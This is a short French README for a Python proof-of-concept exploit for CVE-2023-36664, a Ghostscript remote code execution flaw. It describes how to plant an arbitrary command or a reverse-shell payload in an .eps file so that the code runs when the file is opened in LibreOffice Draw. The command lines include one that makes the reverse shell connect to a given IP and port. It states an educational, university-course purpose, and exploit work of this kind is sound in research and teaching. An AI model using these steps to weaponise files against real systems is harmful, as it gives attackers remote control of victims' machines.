
PoC Python pour CVE-2023-36664 Ghostscript RCE. Injecte des charges utiles ou des shells inversés dans des fichiers .eps pour déclencher l'exécution de code via LibreOffice Draw.
Preuve de concept pour la CVE-2023-36664.
Pour insérer une charge utile dans un fichier .eps :
python3 poc.py -f "filename" --payload "command"
#python3 poc.py -f file.eps --payload firefox
Pour insérer une charge utile de shell inverse dans un fichier .eps :
python3 poc.py -f "filename" --revshell --ip "ip" --port "port"
#python3 poc.py -f file.eps --revshell --ip 192.168.122.1 --port 1234
L'ouverture du fichier injecté dans Libreoffice Draw devrait déclencher la charge utile.
Cette preuve de concept a été développée pour un cours spécifique à l'université. Elle est publiée ici uniquement à des fins pédagogiques.